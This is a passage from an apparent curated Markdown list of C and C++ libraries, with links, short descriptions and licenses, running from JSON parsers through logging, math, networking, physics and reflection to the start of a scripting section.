* [Jansson](https://github.com/akheron/jansson) - C library for encoding, decoding and manipulating JSON data. [MIT] * [jbson](https://github.com/chrismanning/jbson) - jbson is a library for building & iterating BSON data, and JSON documents in C++14. [Boost] * [JeayeSON](https://github.com/jeaye/jeayeson) - A very sane (header only) C++ JSON library. [BSD] * [Jsmn](https://github.com/zserge/jsmn) - A minimalistic JSON parser in C. [MIT] * [json](https://github.com/nlohmann/json) :zap: - JSON for Modern C++. [MIT] [website](https://json.nlohmann.me) * [JSON++](https://github.com/hjiang/jsonxx) - A JSON parser in C++. [MIT] * [json.h](https://github.com/sheredom/json.h) - A simple one header/one source solution to parsing JSON in C and C++. [Unlicense] * [json-build](https://github.com/lcsmuller/json-build) - C89 tiny zero-allocation JSON serializer. [MIT] * [json-c](https://github.com/json-c/json-c) - A JSON implementation in C. [MIT] * [jsoncons](https://github.com/danielaparker/jsoncons) - A C++ header-only library for JSON and JSON-like binary formats with JSONPointer, JSONPatch, JSONPath and JMESPath. [Boost] * [JsonCpp](https://github.com/open-source-parsers/jsoncpp) - A C++ library for interacting with JSON. [MIT] * [jsonParse](https://github.com/liufeigit/jsonParse) - A simple JSON parser in ANSI C. [MIT] * [json-parser](https://github.com/udp/json-parser) - Very low footprint JSON parser written in portable ANSI C. [BSD] * [json11](https://github.com/dropbox/json11) - A tiny JSON library for C++11. [MIT] * [json-struct](https://github.com/jorgen/json_struct) - High performance, single header JSON parser parsing to and from C++ structs. [MIT] * [json-voorhees](https://github.com/tgockel/json-voorhees) - JSON library for C++. Support for C++11. No dependencies, fast and dev-friendly. [Apache2] * [jute](https://github.com/amir-s/jute) - Very simple C++ JSON Parser. [PublicDomain] * [libjson](https://github.com/vincenthz/libjson) - A JSON parser and printer library in C. easy to integrate with any model. [LGPL] * [libjson](http://sourceforge.net/projects/libjson/) - Lightweight JSON library. [?] * [LIBUCL](https://github.com/vstakhov/libucl) :zap: - Universal configuration library parser. [BSD-2-Clause] * [parson](https://github.com/kgabis/parson) - Parson is a lighweight json library written in C. [MIT] * [PicoJSON](https://github.com/kazuho/picojson) - A header-file-only, JSON parser serializer in C++. [BSD] * [qt-json](https://github.com/gaudecker/qt-json) - A simple class for parsing JSON data into a QVariant hierarchy and vice versa. [GPLv3] * [QJson](https://github.com/flavio/qjson) - A qt-based library that maps JSON data to QVariant objects. [LGPL2] * [RapidJSON](https://github.com/miloyip/rapidjson) :zap: - A fast JSON parser/generator for C++ with both SAX/DOM style API. [MIT] [website](https://rapidjson.org) * [sajson](https://github.com/chadaustin/sajson) - Lightweight, extremely high-performance JSON parser for C++11. [MIT] * [simdjson](https://github.com/lemire/simdjson) - Extremely fast JSON library that can parse gigabytes of JSON per second. [Apache-2.0] * [taoJSON](https://github.com/taocpp/json) - Zero-dependency C++ header-only JSON library. [MIT] * [ujson](https://bitbucket.org/awangk/ujson) - µjson is a a small, C++11, UTF-8, JSON library. [MIT] * [UltraJSON](https://github.com/ultrajson/ultrajson) - Ultra fast JSON decoder and encoder written in C. [BSD-3-Clause] * [YAJL](https://github.com/lloyd/yajl) - A fast streaming JSON parsing library in C. [ISC] * [yyjson](https://github.com/ibireme/yyjson) - A high performance JSON library written in ANSI C. [MIT] ## Logging * [Blackhole](https://github.com/3Hren/blackhole) - Attribute-based logging framework, which is designed to be fast, modular and highly customizable. [MIT] * [Boost.Log](https://github.com/boostorg/log) - Designed to be very modular and extensible. [Boost] [website](https://boost.org/libs/log) * [Easylogging++](https://github.com/amrayn/easyloggingpp) - Extremely light-weight high performance logging library for C++11 (or higher) applications. [MIT] * [fmtlog](https://github.com/MengRao/fmtlog) - A performant fmtlib-style logging library with latency in nanoseconds. [MIT] * [G3log](https://github.com/KjellKod/g3log) - Asynchronous logger with Dynamic Sinks. [PublicDomain] * [glog](https://github.com/google/glog) - C++ implementation of the Google logging module. * [Log4cpp](http://log4cpp.sourceforge.net/) - A library of C++ classes for flexible logging to files, syslog, IDSA and other destinations. [LGPL] * [log4cplus](https://github.com/log4cplus/log4cplus) - A simple to use C++ logging API providing thread-safe, flexible, and arbitrarily granular control over log management and configuration. [BSD & Apache2] * [loguru](https://github.com/emilk/loguru) - A lightweight C++ logging library. [PublicDomain] * [plog](https://github.com/SergiusTheBest/plog) - Portable and simple log for C++ in less than 1000 lines of code. [MPL2] * [reckless](https://github.com/mattiasflodin/reckless) - Low-latency, high-throughput, asynchronous logging library for C++. [MIT] * [spdlog](https://github.com/gabime/spdlog) - Super fast, header only, C++ logging library. * [templog](http://www.templog.org/) - A very small and lightweight C++ library which you can use to add logging to your C++ applications. [Boost] * [P7Baical](http://baical.net/p7.html) - An open source and cross-platform library for high-speed sending telemetry & trace data with minimal usage of CPU and memory. [LGPL] * [Quill](https://github.com/odygrd/quill) - Asynchronous cross platform low latency logging library. [MIT] ## Machine Learning * [Caffe](https://github.com/BVLC/caffe) - A fast framework for neural networks. [BSD] * [CCV](https://github.com/liuliu/ccv) - C-based/Cached/Core Computer Vision Library, A Modern Computer Vision Library. [BSD] * [darknet](https://github.com/pjreddie/darknet) - Open source neural network framework written in C and CUDA. [PublicDomain] [website](https://pjreddie.com/darknet/) * [Dlib](https://github.com/davisking/dlib) :zap: - A modern C++11 machine learning, computer vision, numerical optimization, and deep learning toolkit. [Boost] [website](http://dlib.net/) * [Fido](https://github.com/FidoProject/Fido) - A highly-modular C++ machine learning library for embedded electronics and robotics. [MIT] [website](http://fidoproject.github.io/) * [flashlight](https://github.com/facebookresearch/flashlight) - A fast, flexible machine learning library from Facebook AI Research written entirely in C++ and based on the ArrayFire tensor library. [BSD-3-Clause] [website](https://fl.readthedocs.io/en/latest/) * [libsvm](https://github.com/cjlin1/libsvm) - A simple, easy-to-use, efficient library for Support Vector Machines. [BSD-3-Clause] [website](https://www.csie.ntu.edu.tw/~cjlin/libsvm/) * [m2cgen](https://github.com/BayesWitnesses/m2cgen) - A CLI tool to transpile trained classic ML models into a native C code with zero dependencies. [MIT] * [MeTA](https://github.com/meta-toolkit/meta) - A modern C++ data sciences toolkit. [MIT] [website](https://meta-toolkit.org/) * [Minerva](https://github.com/dmlc/minerva) - A fast and flexible system for deep learning. [Apache2] * [mlpack](https://github.com/mlpack/mlpack) - A scalable c++ machine learning library. [LGPLv3] [website](http://www.mlpack.org/) * [OpenCV](https://github.com/Itseez/opencv) :zap: - Open Source Computer Vision Library. [BSD] [website](http://opencv.org/) * [oneDAL](https://github.com/oneapi-src/oneDAL) - A powerful machine learning library that helps speed up big data analysis. [Apache] * [ONNX runtime](https://github.com/microsoft/onnxruntime) - C and C++ library for training and inference ONNX models. ONNX is a standard that AI models can be converted into, regardless of the library they are trained with. [MIT] [website](https://onnxruntime.ai/) * [Recommender](https://github.com/GHamrouni/Recommender) - C library for product recommendations/suggestions using collaborative filtering (CF). [BSD] * [RNNLIB](https://github.com/szcom/rnnlib) - RNNLIB is a recurrent neural network library for sequence learning problems. [GPLv3] * [SHOGUN](https://github.com/shogun-toolbox/shogun) - The Shogun Machine Learning Toolbox. [GPLv3] * [sofia-ml](https://code.google.com/p/sofia-ml/) - The suite of fast incremental algorithms for machine learning. [Apache2] * [VLFeat](https://github.com/vlfeat/vlfeat) - The VLFeat open source library implements popular computer vision algorithms specialising in image understanding and local featurexs extraction and matching. [BSD-2-Clause] [website](http://www.vlfeat.org/) * [xgboost](https://github.com/dmlc/xgboost) - Scalable, Portable and Distributed Gradient Boosting (GBDT, GBRT or GBM) Library, for Python, R, Java, Scala, C++ and more. Runs on single machine, Hadoop, Spark, Flink and DataFlow. [Apache2] * [ncnn](https://github.com/Tencent/ncnn) - A high-performance neural network inference computing framework optimized for mobile platforms. [BSD] ## Math * [Apophenia](https://github.com/b-k/apophenia) - A C library for statistical and scientific computing. [GPL2] * [Armadillo](https://gitlab.com/conradsnicta/armadillo-code) - Fast C++ library for linear algebra & scientific computing. [Apache2] [website](http://arma.sourceforge.net/) * [autodiff](https://github.com/autodiff/autodiff) - A modern, fast and expressive C++ library for automatic differentiation. [MIT] [website](https://autodiff.github.io) * [blaze](https://bitbucket.org/blaze-lib/blaze) - high-performance C++ math library for dense and sparse arithmetic. [BSD] * [Boost.Multiprecision](https://github.com/boostorg/multiprecision) - provides higher-range/precision integer, rational and floating-point types in C++, header-only or with GMP/MPFR/LibTomMath backends. [Boost] [website](https://boost.org/libs/multiprecision) * [ceres-solver](http://ceres-solver.org/) - C++ library for modeling and solving large complicated nonlinear least squares problems from google. [BSD] * [CGAL](https://github.com/CGAL/cgal) - Collection of efficient and reliable geometric algorithms. [LGPL&GPL] [website](http://www.cgal.org/) * [cml](http://cmldev.net/) - free C++ math library for games and graphics. [Boost] * [CNL](https://github.com/johnmcfarlane/cnl/) - A Compositional Numeric Library for C++. [Boost] * [DirectXMath](https://github.com/microsoft/DirectXMath) - An all inline SIMD C++ linear algebra library for use in games and graphics apps. * [Dlib](https://github.com/davisking/dlib) :zap: - A modern C++11 machine learning, computer vision, numerical optimization, and deep learning toolkit. [Boost] [website](http://dlib.net/) * [Eigen](http://eigen.tuxfamily.org/) - A high-level C++ library of template headers for linear algebra, matrix and vector operations, numerical solvers and related algorithms. [MPL2] * [ExprTk](https://www.partow.net/programming/exprtk/) - The C++ Mathematical Expression Toolkit Library (ExprTk) is a simple to use, easy to integrate and extremely efficient run-time mathematical expression parser and evaluation engine. [MIT] * [Geometric Tools](https://www.geometrictools.com) - C++ library for computing in the fields of mathematics, graphics, image analysis and physics. [Boost] [website](https://www.geometrictools.com) * [GLM](https://github.com/g-truc/glm) - Header-only C++ math library that matches and inter-operates with OpenGL's GLSL math. [MIT] [website](https://glm.g-truc.net/) * [GMTL](http://ggt.sourceforge.net/) - Graphics Math Template Library is a collection of tools implementing Graphics primitives in generalized ways. [GPL2] * [GMP](https://gmplib.org/) - A C library for arbitrary precision arithmetic, operating on signed integers, rational numbers, and floating-point numbers. [LGPL3 & GPL2] * [Klein](https://github.com/jeremyong/klein) - A fast, SIMD-optimized C++17 Geometric Algebra library for point, line, and plane projections, intersections, joins, rigid-body motion, and more. [MIT] [website](https://jeremyong.com/klein) * [linalg.h](https://github.com/sgorsten/linalg) - Single header, public domain, short vector math library for C++. [Unlicense] * [MatX](https://github.com/NVIDIA/MatX) - A GPU-accelerated C++17 numerical computing library with a MATLAB/Python-like syntax. [BSD 3-clause] * [MIRACL](https://github.com/CertiVox/MIRACL) - A Multiprecision Integer and Rational Arithmetic Cryptographic Library. [AGPL] * [NumCpp](https://github.com/dpilger26/NumCpp) - A templatized header only C++ implementation of the Python Numpy library. [MIT] * [muparser](https://beltoforion.de/en/muparser) - muParser is an extensible high performance math expression parser library written in C++. [MIT] * [LibTomMath](https://github.com/libtom/libtommath) - A free open source portable number theoretic multiple-precision integer library written entirely in C. [PublicDomain & WTFPL] [website](http://www.libtom.net/) * [linmath.h](https://github.com/datenwolf/linmath.h) - A lean linear math library, aimed at graphics programming. [WTFPL] * [lp_solve](https://sourceforge.net/projects/lpsolve) - A library used to formulate and solve linear programming problems. [LGPL] [website](http://lpsolve.sourceforge.net) * [OpenBLAS](https://github.com/xianyi/OpenBLAS) - An optimized BLAS library based on GotoBLAS2 1.13 BSD version. [BSD 3-clause] [website](http://www.openblas.net/) * [PCG-rand](https://www.pcg-random.org/) - PCG is a family of simple fast space-efficient statistically good algorithms for random number generation. Unlike many general-purpose RNGs, they are also hard to predict. [Apache] * [QuantLib](https://github.com/lballabio/quantlib) - A free/open-source library for quantitative finance. [Modified BSD] [website](http://quantlib.org/) * [StatsLib](https://github.com/kthohr/stats) - A C++ header-only library of statistical distribution functions. [Apache2] [website](https://www.kthohr.com/statslib.html) * [SymEngine](https://github.com/symengine/symengine) - Fast symbolic manipulation library, a rewriting of SymPy's core in C++. [MIT] * [TinyExpr](https://github.com/codeplea/tinyexpr) - A C library for parsing and evaluating math expressions from strings. [zlib] * [Vc](https://github.com/VcDevel/Vc) - SIMD Vector Classes for C++. [BSD] * [Versor](http://versor.mat.ucsb.edu/) - A (fast) Generic C++ library for Geometric Algebras, including Euclidean, Projective, Conformal, Spacetime (etc). * [Wykobi](https://www.wykobi.com) - A C++ library of efficient, robust and simple to use C++ 2D/3D oriented computational geometry routines. [MIT] * [xtensor](https://github.com/xtensor-stack/xtensor) - A C++14 library for numerical analysis with multi-dimensional array expressions, inspired by NumPy syntax. [BSD 3-clause] [website](https://xtensor-stack.github.io/xtensor) * [universal](https://github.com/stillwater-sc/universal) - A C++14 header-only library implementing arbitrary posit arithmetic. The posit number system is a tapered floating point that is more efficient than IEEE floating point. Posits enable reproducible computational science. [MIT license] ## Memory Allocation * [Boehm GC](https://github.com/ivmai/bdwgc) - Conservative garbage collector for C and C++. [similar to X11] [website](http://www.hboehm.info/gc/) * [C Smart Pointers](https://github.com/Snaipe/libcsptr) - Smart pointers for the (GNU) C programming language. [MIT] * [Hoard](https://github.com/emeryberger/Hoard) - Fast, Scalable, and Memory-efficient Malloc for Linux, Windows, and Mac. [GPL, commercial] [website](http://hoard.org/) * [jemalloc](https://github.com/jemalloc/jemalloc) - General purpose malloc(3) implementation that emphasizes fragmentation avoidance and scalable concurrency support. [BSD] [website](http://jemalloc.net/) * [memory](https://github.com/foonathan/memory) - STL compatible C++ memory allocator library. [ZLib] * [memory-allocators](https://github.com/mtrebi/memory-allocators) - Custom memory allocators to improve the performance of dynamic memory allocation. [MIT] * [mimalloc](https://github.com/microsoft/mimalloc) - A compact general purpose allocator with excellent performance. [MIT] * [rpmalloc](https://github.com/mjansson/rpmalloc) - Cross platform lock free thread caching 16-byte aligned memory allocator implemented in C. [PublicDomain] * [snmalloc](https://github.com/microsoft/snmalloc) - Message passing based high-performance allocator. [MIT] * [TCMalloc](https://github.com/google/tcmalloc) - Google's fast, multi-threaded malloc implementation. [Apache-2.0] [website](https://google.github.io/tcmalloc/) * [tgc](https://github.com/orangeduck/tgc) - A tiny garbage collector for C written in \~500 LOC. [BSD] ## Multimedia * [GStreamer](http://gstreamer.freedesktop.org/) - A library for constructing graphs of media-handling components. [LGPL] * [libass](https://github.com/libass/libass) - Portable subtitle renderer for the ASS/SSA subtitle format. [ISC] * [libav](https://github.com/libav/libav) - A collection of libraries and tools to process multimedia content such as audio, video, subtitles and related metadata. [LGPL v2.1+ and others] [website](https://www.libav.org/) * [LIVE555 Streaming Media](http://www.live555.com/liveMedia/) - Multimedia streaming library using open standard protocols (RTP/RTCP, RTSP, SIP). [LGPL] * [libVLC](https://wiki.videolan.org/LibVLC) - libVLC (VLC SDK) media framework. [GPL] * [MediaInfoLib](https://github.com/MediaArea/MediaInfoLib) - Convenient unified display of the most relevant technical and tag data for video and audio files. [BSD] * [QtAv](https://github.com/wang-bin/QtAV) - A multimedia playback framework based on Qt and FFmpeg to write a player easily. [LGPL] [website](http://wang-bin.github.io/QtAV/) * [SDL](https://github.com/libsdl-org/SDL) :zap: - Simple DirectMedia Layer. [zlib] [website](https://libsdl.org) * [SFML](https://github.com/SFML/SFML) :zap: - Simple and Fast Multimedia Library. [zlib] [website](http://www.sfml-dev.org/) * [TagLib](https://github.com/taglib/taglib) - A library for reading and editing the metadata of several popular audio formats. [LGPL/MPL] [website](https://taglib.org/) ## Networking * [ACE](http://www.dre.vanderbilt.edu/~schmidt/ACE.html) - An OO Network Programming Toolkit in C++. [?MIT?] * [Boost.Asio](https://github.com/boostorg/asio) :zap: - A cross-platform C++ library for network and low-level I/O programming. [Boost] [website](https://boost.org/libs/asio) * [Boost.Beast](https://github.com/boostorg/beast) :zap: - HTTP and WebSocket built on Boost.Asio in C++11. [Boost] [website](https://www.boost.org/libs/beast) * [Breep](https://github.com/Organic-Code/Breep) - Event based, high-level C++14 peer-to-peer library. [EUPL-1.1 (OSI approved)] * [C++ REST SDK](https://github.com/Microsoft/cpprestsdk) - C++ REST SDK (previously named Casablanca). [Apache2] * [Restbed](https://github.com/corvusoft/restbed) - C++11 Asynchronous RESTful framework. [AGPL] * [Restinio](https://github.com/Stiffstream/restinio) - A header-only C++14 library that gives you an embedded HTTP/Websocket server. [BSD] * [c-ares](https://github.com/c-ares/c-ares) - A C library for asynchronous DNS requests. [MIT] * [cpp-httplib](https://github.com/yhirose/cpp-httplib) - A single file C++11 header-only HTTP/HTTPS server library. [MIT] * [cpp-netlib](http://cpp-netlib.org/) - A collection of open-source libraries for high level network programming. [Boost] * [cpp-netlib/uri](https://github.com/cpp-netlib/uri) - URI parser/builder library for C++, compatible with RFC 3986 and RFC 3987. [Boost] * [CppServer](https://github.com/chronoxor/CppServer) - Ultra fast and low latency asynchronous socket server & client C++ library with support TCP, SSL, UDP, HTTP, HTTPS, WebSocket protocols and 10K connections problem solution. [MIT] * [cpr](https://github.com/whoshuu/cpr) - A modern C++ HTTP requests library with a simple but powerful interface. Modeled after the Python Requests module. [MIT] [website](https://docs.libcpr.org) * [curlcpp](https://github.com/JosephP91/curlcpp) - An object oriented C++ wrapper for CURL(libcurl). [MIT] * [DPDK](https://github.com/DPDK/dpdk) - Data Plane Development Kit, libraries and drivers for fast packet processing. [BSD-3-Clause & GPL-2.0] [website](https://www.dpdk.org/) * [Dyad.c](https://github.com/rxi/dyad) - Asynchronous networking for C. [MIT] * [ENet](https://github.com/lsalzman/enet) - Reliable UDP networking library. [MIT] [website](http://enet.bespin.org/) * [evpp](https://github.com/Qihoo360/evpp) - C++ high performance networking with TCP/UDP/HTTP protocols. [BSD] * [H2O](https://github.com/h2o/h2o) - An optimized HTTP server with support for HTTP/1.x and HTTP/2. It can also be used as a library. [MIT] * [HTTP Parser](https://github.com/nodejs/http-parser) :zap: - A http request/response parser for C. [MIT] * [KCP](https://github.com/skywind3000/kcp/blob/master/README.en.md) - A fast and reliable ARQ protocol that helps applications to reduce network latency. [MIT] * [libcurl](http://curl.haxx.se/libcurl/) - Multiprotocol file transfer library. [MIT/X derivate license] * [libhttpserver](https://github.com/etr/libhttpserver) - C++ library for creating an embedded Rest HTTP server (and more). [LGPL2.1] * [Libmicrohttpd](http://www.gnu.org/software/libmicrohttpd/) - GNU libmicrohttpd is a small C library that is supposed to make it easy to run an HTTP server as part of another application. [LGPL v2.1+] * [libpcap](https://github.com/the-tcpdump-group/libpcap) - A portable C/C++ library for network traffic capture. [BSD] [website](https://www.tcpdump.org/) * [libquic](https://github.com/devsisters/libquic) - A QUIC protocol library extracted from Chromium's QUIC Implementation. [BSD] * [librdkafka](https://github.com/edenhill/librdkafka) - Apache Kafka client library for C and C++. [BSD-2-Clause] * [libwebsockets](https://github.com/warmcat/libwebsockets) - A lightweight pure C WebSocket implementation that provides both client and server libraries. [LGPL2.1 + static link exception] [website](https://libwebsockets.org/) * [Lithium](https://matt-42.github.io/lithium/) - Build high performance C++ HTTP servers without being a C++ expert. [MIT] * [lwIP](http://savannah.nongnu.org/projects/lwip/) - A lightweight TCP/IP stack. [Modified BSD] * [Mongoose](https://github.com/cesanta/mongoose) - Extremely lightweight webserver. [GPL2] * [MQTT-C](https://github.com/LiamBindle/MQTT-C) - A portable MQTT C client for embedded systems and PCs alike. [MIT] [website](https://liambindle.ca/MQTT-C) * [mTCP](https://github.com/mtcp-stack/mtcp) - Highly scalable user-level TCP stack for multicore systems. [Modified BSD] * [Muduo](https://github.com/chenshuo/muduo) - A C++ non-blocking network library for multi-threaded server in Linux. [BSD] * [nghttp2](https://github.com/nghttp2/nghttp2) - HTTP/2 C Library. [MIT] [website](https://nghttp2.org/) * [Onion](https://github.com/davidmoreno/onion) - HTTP server library in C designed to be lightweight and easy to use. [Apache2/GPL2] * [PF_RING™](https://github.com/ntop/PF_RING) - High-speed packet processing framework. [LGPL-2.1] [website](https://www.ntop.org/products/packet-capture/pf_ring/) * [PicoHTTPParser](https://github.com/h2o/picohttpparser) - A tiny, primitive, fast HTTP request/response parser. [MIT] * [POCO](https://github.com/pocoproject) :zap: - C++ class libraries and frameworks for building network- and internet-based applications that run on desktop, server, mobile and embedded systems. [Boost] [website](http://pocoproject.org/) * [Proxygen](https://github.com/facebook/proxygen) - Facebook's collection of C++ HTTP libraries including an easy to use HTTP server. [BSD] * [RakNet](https://github.com/OculusVR/RakNet) - A cross platform, open source, C++ networking engine for game programmers. [BSD] * [restclient-cpp](https://github.com/mrtazz/restclient-cpp) - Simple REST client for C++. It wraps libcurl for HTTP requests. [MIT] * [Seasocks](https://github.com/mattgodbolt/seasocks) - Simple, small, C++ embeddable webserver with WebSockets support. [BSD] * [tlse](https://github.com/eduardsui/tlse) - Single C file TLS 1.2/1.3 implementation, using tomcrypt as crypto library [BSD-2-Clause] * [Tufão](https://github.com/vinipsmaker/tufao) - An asynchronous web framework for C++ built on top of Qt. [LGPL2] * [uriparser](https://github.com/uriparser/uriparser) - Strictly RFC 3986 compliant URI parsing and handling library. [BSD-3-Clause] * [uWebSockets](https://github.com/uNetworking/uWebSockets) - µWS is one of the most lightweight, efficient & scalable WebSocket & HTTP server implementations available. [Zlib] * [WAFer](https://github.com/riolet/WAFer) - A C language-based ultra-light software platform for scalable server-side and networking applications. Think node.js for C programmers. [GPL2] * [Wangle](https://github.com/facebook/wangle) - A client/server application framework to build asynchronous, event-driven modern C++ services. [Apache-2.0] * [wdt](https://github.com/facebook/wdt) - An embeddedable library (and command line tool) aiming to transfer data between 2 systems as fast as possible over multiple TCP paths. [BSD-3-Clause] * [WebSocket++](https://github.com/zaphoyd/websocketpp) - C++/Boost Asio based websocket client/server library. [BSD] * [PcapPlusPlus](https://github.com/seladb/PcapPlusPlus) - a multiplatform C++ network sniffing and packet parsing and crafting framework. [Unlicense] * [ZeroMQ](https://github.com/zeromq/libzmq) - High-speed, modular asynchronous communication library. [LGPL] [website](http://zeromq.org/) ## PDF *Libraries for parsing and manipulating PDF documents.* * [libharu](https://github.com/libharu/libharu) - A free, cross platform, open-sourced software library for generating PDF. [zlib] * [litePDF](https://litepdf.sourceforge.io) - Library to create and edit PDF documents that uses GDI functions through a device context to draw the page content. [LGPL v3 and zlib] * [MuPDF](https://mupdf.com/) - A lightweight PDF, XPS, and E-book viewer. [AGPL/Commercial] * [PoDoFo](http://podofo.sourceforge.net/) - A library to work with the PDF file format. [LGPL] * [Poppler](https://poppler.freedesktop.org/) - Open-source multi-backend PDF rendering library based on the xpdf-3.0 code base. [GPLv2/GPLv3] * [Xpdf](https://www.xpdfreader.com/) - Xpdf is a free PDF viewer and toolkit, including a text extractor, image converter, HTML converter, and more. [GPL v2/GPL v3] * [DynaPDF](http://www.dynaforms.com/) - An easy-to-use PDF generation library. [Commercial] ## Physics *Dynamics simulation engines* * [Box2D](https://github.com/erincatto/Box2D) - A 2D physics engine for games. [BSD-like] * [Bullet](https://github.com/bulletphysics/bullet3) - A 3D physics engine for games. [zlib] [website](http://bulletphysics.org) * [Chipmunk](https://github.com/slembcke/Chipmunk2D) - A fast and lightweight 2D game physics library. [MIT] [website](https://chipmunk-physics.net/) * [LiquidFun](https://github.com/google/liquidfun) - A 2D physics engine for games. [BSD-like] * [Newton Dynamics](https://github.com/MADEAPPS/newton-dynamics) - An integrated solution for real time simulation of physics environments. [zlib] * [ODE](http://www.ode.org/) - Open Dynamics Engine - An open source, high performance library for simulating rigid body dynamics. [BSD&LGPL] * [Kratos](https://github.com/KratosMultiphysics/Kratos) - framework for building parallel, multi-disciplinary simulation software, aiming at modularity, extensibility, and high performance. [BSD] [website](http://www.cimne.com/kratos/) * [ofxBox2d](https://github.com/vanderlin/ofxBox2d) - openFrameworks wrapper for Box2D. [BSD-like] * [PhysX](https://github.com/NVIDIAGameWorks/PhysX-3.4) - An open-source realtime physics engine middleware SDK developed by Nvidia as a part of Nvidia GameWorks software suite. [BSD-3-Clause] * [Project Chrono](https://github.com/projectchrono/chrono) - An open source multi-physics simulation engine. [BSD-3-Clause] [website](https://projectchrono.org/) * [Quantum++](https://github.com/vsoftco/qpp) - A modern C++11 quantum computing library. [MIT] * [Simbody](https://github.com/simbody/simbody) - High-performance C++ multibody dynamics/physics library for simulating articulated biomechanical and mechanical systems like vehicles, robots, and the human skeleton. [Apache2] * [SOFA](https://github.com/sofa-framework/sofa) - SOFA is an open-source framework targeting at real-time simulation, with an emphasis on medical simulation. [LGPL] [website](https://www.sofa-framework.org) ## Reflection * [config-loader](https://github.com/netcan/config-loader) - A C++17 static reflection framework, from parse configuration file to native data structure. [MIT] * [Better Enums](https://github.com/aantron/better-enums) - Reflective enums (to string, iteration). Single header. [BSD] [website](http://aantron.github.io/better-enums/) * [clReflect](https://github.com/Celtoys/clReflect) - C++ Reflection using clang. [MIT] * [CPFG](https://github.com/cpgf/cpgf) - A C++03 library for reflection, callback and script binding. [Apache2] * [CPP-Reflection](https://github.com/AustinBrunkhorst/CPP-Reflection) - C++ Reflection using clang. [MIT] * [Easy Reflection](https://github.com/chocolacula/easy_reflection_cpp) - Easy and fast reflection + serialization solution like in Rust, Java or Go. [Apache] * [Magic Enum](https://github.com/Neargye/magic_enum) - Header-only C++17 library provides static reflection for enums (to string, from string, iteration), work with any enum type without any macro or boilerplate code. [MIT] * [magic_get](https://github.com/apolukhin/magic_get) - std::tuple like methods for user defined types without any macro or boilerplate code. [Boost] * [meta](https://github.com/skypjack/meta) - Header-only, non-intrusive and macro-free runtime reflection system in C++. [MIT] * [Nameof](https://github.com/Neargye/nameof) - Header-only C++17 library provides nameof macros and functions to obtain the simple name of variable, type, function, macro, and enum. [MIT] * [Ponder](https://github.com/billyquith/ponder) - A C++11 library for reflection. [MIT] * [RTTR](https://github.com/rttrorg/rttr) - A C++11 library for reflection. [MIT] [website](http://www.rttr.org) * [TSMP](https://github.com/fabian-jung/tsmp) - An intrusion and macro-free C++20 library for static reflection. It uses libclang to extract reflection data from your source code and makes it usable via template specialization. [MIT] * [visit_struct](https://github.com/cbeck88/visit_struct) - A miniature library for struct-field reflection in C++. [Boost] * [Refureku](https://github.com/jsoysouvanh/Refureku) - A C++17 runtime reflection and code generation library. [MIT] ## Regular Expression * [CppVerbalExpressions](https://github.com/VerbalExpressions/CppVerbalExpressions) - C++ regular expressions made easy. [MIT] * [CTRE](https://github.com/hanickadot/compile-time-regular-expressions) - A Compile time PCRE (almost) compatible regular expression matcher. [MIT] * [Hyperscan](https://github.com/intel/hyperscan) - Hyperscan is a high-performance multiple regex matching library by Intel. Provides simultaneous matching of large numbers of regexps (up to tens of thousands). Typically used in a DPI library stack. [BSD] * [Oniguruma](https://github.com/kkos/oniguruma) - A modern and flexible regular expressions library that supports a variety of character encodings. [BSD] * [PCRE](http://pcre.org/) - A regular expression C library inspired by the regular expression capabilities in Perl. [BSD] * [PIRE](https://github.com/yandex/pire) - Perl Incompatible Regular Expressions library by Yandex. Can be really fast (more than 400 MB/s). [LPGL v3.0] * [RE2](https://github.com/google/re2) - A software library for regular expressions via a finite-state machine using automata theory. [BSD-3-Clause] * [SLRE](https://github.com/cesanta/slre) - Super Light Regexp engine for C/C++. [GPLv2/Commercial] * [sregex](https://github.com/openresty/sregex) - A non-backtracking NFA/DFA-based Perl-compatible regex engine library for matching on large data streams. [BSD] ## Robotics * [MOOS-IvP](http://moos-ivp.org) - A set of open source C++ modules for providing autonomy on robotic platforms, in particular autonomous marine vehicles. * [MRPT](http://www.mrpt.org/) - Mobile Robot Programming Toolkit. [BSD] * [PCL](https://github.com/PointCloudLibrary/pcl) - Point Cloud Library is a standalone, large scale, open project for 2D/3D image and point cloud processing. [BSD] [website](http://www.pointclouds.org/) * [Robotics Library (RL)](http://www.roboticslibrary.org/) - A self-contained C++ library for robot kinematics, motion planning and control. [BSD] * [RobWork](https://gitlab.com/sdurobotics/RobWork) - A collection of C++ libraries for simulation and control of robot systems. [Apache2] [website](http://www.robwork.dk/) * [ROS](http://wiki.ros.org/) - Robot Operating System provides libraries and tools to help software developers create robot applications. [BSD] * [Ruckig](https://github.com/pantor/ruckig) - Real-time motion generation for robots and machines. [MIT] [website](https://ruckig.com) * [YARP (Yet Another Robot Platform)](https://github.com/robotology/yarp) - Library and toolkit for communication and device interfaces. [BSD-3-Clause] [website](http://www.yarp.it/) ## Scientific Computing * [AMGCL](https://github.com/ddemidov/amgcl) - a header-only C++ library for solving large sparse linear systems with algebraic multigrid. [MIT] * [FFTW](http://www.fftw.org/) - A C library for computing the DFT in one or more dimensions. [GPL] * [GSL](http://www.gnu.org/software/gsl/) - GNU scientific library. [GPL] * [preCICE](https://github.com/precice/precice) - Coupling library for partitioned multi-physics simulations (FSI, CHT, and more). [LGPL] [website](https://precice.org/) * [TileDB](https://github.com/TileDB-Inc/TileDB) - Fast Dense and Sparse Multidimensional Array DBMS. [MIT] [website](https://tiledb.io/) * [Trilinos](https://github.com/trilinos/Trilinos) - High performance PDE solvers. [BSD] * [Torch](https://github.com/torch/torch7) - A scientific computing framework with wide support for machine learning algorithms that puts GPUs first. [BSD-3-Clause] [website](http://torch.ch/) ## Scripting * [AngelScript](https://www.angelcode.com/angelscript/) - AngelScript is a game-oriented interpreted/compiled scripting language. [zlib] * [Boost.Python](https://github.com/boostorg/python) - A C++ library which enables seamless interoperability between C++ and the Python programming language. [Boost] [website](https://boost.org/libs/python) * [cppimport](https://github.com/tbenthompson/cppimport) - Import C++ files directly from Python! [MIT] * [CppSharp](https://github.com/mono/CppSharp) - Tools and libraries to glue C/C++ APIs to high-level languages. [MIT] * [ChaiScript](https://github.com/ChaiScript/ChaiScript/) - An easy to use embedded scripting language for C++. [BSD] [website](http://chaiscript.com/) * [ctypes.sh](https://github.com/taviso/ctypes.sh) - A foreign function interface for bash. [MIT] * [Cython](https://github.com/cython/cython) - Cython is an optimising static compiler for both the Python programming language and the extended Cython programming language (based on Pyrex). It makes writing C extensions for Python as easy as Python itself. [Apache] [website](http://cython.org/) * [djinni](https://djinni.xlcpp.dev) - A tool for generating cross-language type declarations and interface bindings. [Apache2] * 